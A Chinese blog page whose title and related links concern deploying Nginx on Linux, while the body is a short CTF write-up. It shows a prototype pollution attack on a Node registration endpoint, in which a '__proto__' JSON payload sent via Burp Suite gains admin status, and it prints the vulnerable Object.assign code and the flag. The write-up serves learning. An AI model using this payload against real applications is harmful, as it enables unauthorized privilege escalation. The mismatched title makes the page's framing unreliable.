0
点赞
收藏
分享

微信扫一扫

linux 部署Nginx

写心之所想 2023-05-25 阅读 65
javajavascript前端
查看提示:不需要爆破

进入到靶场中,发现需要注册用户

到达注册页面,is admin需要打勾,并输入同样

burpsuite抓包
原来payload:{"username":"1","password":"1","isAdmin":true,"inviteCode":"1"}
payload:{"username":"1","password":"1","__proto__":{"isAdmin":true},"inviteCode":"1"}

放包即可注册成功,不需要重放 ,然后登录刚刚注册好的页面
得到最终的flag CatCTF{test_flag_h0w_c@n_I_l1ve_w1th0ut_nilou}

 原型链污染

app.post('/register', (req, res) => {
    let user = JSON.parse(req.body)
    if (!user.username || !user.password) {
        return res.json({ msg: 'empty username or password', err: true })
    }
    if (users.filter(u => u.username == user.username).length) {
        return res.json({ msg: 'username already exists', err: true })
    }
    if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
        return res.json({ msg: 'invalid invite code', err: true })
    }
    let newUser = Object.assign({}, baseUser, user) //就是这里,原型链污染
    users.push(newUser)
    res.json({ msg: 'user created successfully', err: false })
})
举报

相关推荐

linux下nginx部署

nginxcentoshtml运维私藏项目实操分享

Linux部署nginx访问文件403

人工智能深度学习机器学习

linux系统 nginx-部署安装

nginx配置文件共享库部署Windows Server服务器yyds干货盘点

Linux+Nginx部署Vue项目

7-zipvue.js前端根目录linuxHarmonyOS后端开发

Nginx部署前后端分离项目(Linux)

paddlepaddle人工智能

如何在linux系统上部署nginx

nginxtomcat负载均衡服务器运维sql

Linux安装部署服务:Nginx和Openresty

linuxnginxopenresty

【Linux】部署Ant Design Pro至Nginx

日记本Linux

Nginx学习笔记总结:在Linux环境下安装部署Nginx

nginx服务器经验分享端口号安装包Java编程语言

Nginx:Nginx热部署

nginx运维linux配置文件信号量云平台云计算
0 条评论